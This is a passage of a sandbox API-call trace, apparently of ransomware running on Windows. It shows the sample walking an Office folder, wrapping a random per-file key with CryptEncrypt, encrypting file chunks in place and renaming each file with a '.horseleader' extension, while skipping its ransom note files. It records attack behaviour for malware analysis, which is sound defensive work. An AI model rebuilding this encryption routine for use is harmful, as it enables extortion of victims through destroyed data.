(in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.551] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0234.551] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0234.551] CloseHandle (hObject=0x1a4) returned 1 [0234.551] GetProcessHeap () returned 0x780000 [0234.551] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0234.552] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.horseleader") returned 88 [0234.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.horseleader")) returned 1 [0234.553] GetProcessHeap () returned 0x780000 [0234.553] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0234.553] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xd2990, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACEWSTR.DLL", cAlternateFileName="")) returned 1 [0234.553] lstrcmpiW (lpString1="ACEWSTR.DLL", lpString2="Windows") returned -1 [0234.553] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 76 [0234.553] StrStrIW (lpFirst="ACEWSTR.DLL", lpSrch=".horseleader") returned 0x0 [0234.553] lstrcmpW (lpString1="ACEWSTR.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.553] lstrcmpW (lpString1="ACEWSTR.DLL", lpString2="_uninstalling_.png") returned 1 [0234.553] lstrlenW (lpString=".testttjffg") returned 11 [0234.553] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL", lpSrch=".testttjffg") returned 0x0 [0234.553] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.553] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.555] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 76 [0234.555] StrStrW (lpFirst="ACEWSTR.DLL", lpSrch=".txt") returned 0x0 [0234.555] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=862608) returned 1 [0234.555] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.555] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.578] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.578] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.578] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x66cc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.578] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.950] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.950] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.950] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcd990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.950] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.749] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.749] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.749] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.750] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0236.750] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0236.750] CloseHandle (hObject=0x1a4) returned 1 [0236.750] GetProcessHeap () returned 0x780000 [0236.750] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0236.750] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.horseleader") returned 88 [0236.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.horseleader")) returned 1 [0236.751] GetProcessHeap () returned 0x780000 [0236.751] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0236.751] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f139500, ftCreationTime.dwHighDateTime=0x1c69359, ftLastAccessTime.dwLowDateTime=0xee2ce510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7f139500, ftLastWriteTime.dwHighDateTime=0x1c69359, nFileSizeHigh=0x0, nFileSizeLow=0x19a3ff, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ADO210.CHM", cAlternateFileName="")) returned 1 [0236.751] lstrcmpiW (lpString1="ADO210.CHM", lpString2="Windows") returned -1 [0236.752] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 75 [0236.752] StrStrIW (lpFirst="ADO210.CHM", lpSrch=".horseleader") returned 0x0 [0236.752] lstrcmpW (lpString1="ADO210.CHM", lpString2="#Decrypt#.txt") returned 1 [0236.752] lstrcmpW (lpString1="ADO210.CHM", lpString2="_uninstalling_.png") returned 1 [0236.752] lstrlenW (lpString=".testttjffg") returned 11 [0236.752] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM", lpSrch=".testttjffg") returned 0x0 [0236.752] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0236.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0236.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0236.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 75 [0236.753] StrStrW (lpFirst="ADO210.CHM", lpSrch=".txt") returned 0x0 [0236.753] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1680383) returned 1 [0236.753] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.753] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.770] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.771] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.771] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xca9ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.771] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.779] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.779] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.779] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1953ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.779] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.819] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.819] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.820] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.820] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0236.820] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0236.820] CloseHandle (hObject=0x1a4) returned 1 [0236.821] GetProcessHeap () returned 0x780000 [0236.821] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0236.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.horseleader") returned 87 [0236.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.horseleader")) returned 1 [0236.822] GetProcessHeap () returned 0x780000 [0236.822] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0236.822] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b06d00, ftCreationTime.dwHighDateTime=0x1ca9127, ftLastAccessTime.dwLowDateTime=0xee2ce510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe4b06d00, ftLastWriteTime.dwHighDateTime=0x1ca9127, nFileSizeHigh=0x0, nFileSizeLow=0x25b50, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ALRTINTL.DLL", cAlternateFileName="")) returned 1 [0236.823] lstrcmpiW (lpString1="ALRTINTL.DLL", lpString2="Windows") returned -1 [0236.823] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 77 [0236.823] StrStrIW (lpFirst="ALRTINTL.DLL", lpSrch=".horseleader") returned 0x0 [0236.823] lstrcmpW (lpString1="ALRTINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0236.823] lstrcmpW (lpString1="ALRTINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0236.823] lstrlenW (lpString=".testttjffg") returned 11 [0236.823] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0236.823] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0236.823] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0236.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0236.825] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 77 [0236.825] StrStrW (lpFirst="ALRTINTL.DLL", lpSrch=".txt") returned 0x0 [0236.825] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=154448) returned 1 [0236.825] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.825] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.864] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.864] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.864] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x105a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.864] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.925] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.925] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.926] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x20b50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.926] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.970] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.970] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.971] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.971] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0236.971] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0236.971] CloseHandle (hObject=0x1a4) returned 1 [0236.971] GetProcessHeap () returned 0x780000 [0236.971] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0236.971] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.horseleader") returned 89 [0236.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.horseleader")) returned 1 [0236.972] GetProcessHeap () returned 0x780000 [0236.972] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0236.972] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e15000, ftCreationTime.dwHighDateTime=0x1cbf3e5, ftLastAccessTime.dwLowDateTime=0xc24a9ec0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe5e15000, ftLastWriteTime.dwHighDateTime=0x1cbf3e5, nFileSizeHigh=0x0, nFileSizeLow=0x269380, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="MSOINTL.DLL", cAlternateFileName="")) returned 1 [0236.972] lstrcmpiW (lpString1="MSOINTL.DLL", lpString2="Windows") returned -1 [0236.972] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 76 [0236.972] StrStrIW (lpFirst="MSOINTL.DLL", lpSrch=".horseleader") returned 0x0 [0236.972] lstrcmpW (lpString1="MSOINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0236.972] lstrcmpW (lpString1="MSOINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0236.972] lstrlenW (lpString=".testttjffg") returned 11 [0236.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0236.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0236.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0236.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0236.973] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 76 [0236.973] StrStrW (lpFirst="MSOINTL.DLL", lpSrch=".txt") returned 0x0 [0236.973] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2528128) returned 1 [0236.974] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.974] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.976] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.976] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.976] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1321c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.976] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.983] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0236.983] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0236.983] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x264380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.983] ReadFile (in: hFile=0x1a4, 